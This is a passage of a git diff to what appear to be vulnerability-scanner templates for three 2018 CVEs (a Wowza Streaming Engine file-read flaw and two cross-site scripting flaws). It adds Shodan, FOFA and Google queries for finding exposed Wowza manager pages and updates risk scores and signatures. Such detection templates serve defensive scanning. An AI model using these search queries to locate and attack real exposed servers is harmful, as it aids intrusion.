-# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022007c53cf671939677e00de61243865a0068c5542caaa6c5cd30f75ccdd260b635022100f46356ee53fbf6fa0d8cd6812648b170cec5116aa67dee258bc1d3a8601851da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml
index 2b040cfd71..5e97818e28 100644
--- a/http/cves/2018/CVE-2018-19365.yaml
+++ b/http/cves/2018/CVE-2018-19365.yaml
@@ -26,6 +26,9 @@ info:
max-request: 1
vendor: wowza
product: streaming_engine
+ shodan-query: http.title:"manager" product:"wowza streaming engine"
+ fofa-query: title="manager" product:"wowza streaming engine"
+ google-query: intitle:"manager" product:"wowza streaming engine"
tags: cve2018,cve,wowza,lfi
http:
@@ -43,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202d7436ced4be69231d67f9b6d6fddf86f75ca1a49358007478a1cacc3869f56c02206093ccabaa5b727f429b541d96da3d9028334eb9b029a25ba8128795d70b7f40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml
index fee4a77a5f..7fbd5422cb 100644
--- a/http/cves/2018/CVE-2018-19386.yaml
+++ b/http/cves/2018/CVE-2018-19386.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-19386
cwe-id: CWE-79
epss-score: 0.00177
- epss-percentile: 0.53963
+ epss-percentile: 0.54797
cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100cb661a6ea402a8fe1df0ba6f686efa2e17994e84eb11f9c17383364f88f285880220308c0de4c8f2b5e65feb3809c645cc919a6494252251cc678e86295fca8383a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml
index 509be08df3..617694b8dd 100644
--- a/http/cves/2018/CVE-2018-19439.yaml
+++ b/http/cves/2018/CVE-2018-19439.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-19439
cwe-id: CWE-79
- epss-score: 0.00548
- epss-percentile: 0.76986
+ epss-score: 0.0038
+ epss-percentile: 0.72872
cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -38,4 +38,4 @@ http:
part: body
words:
- "
+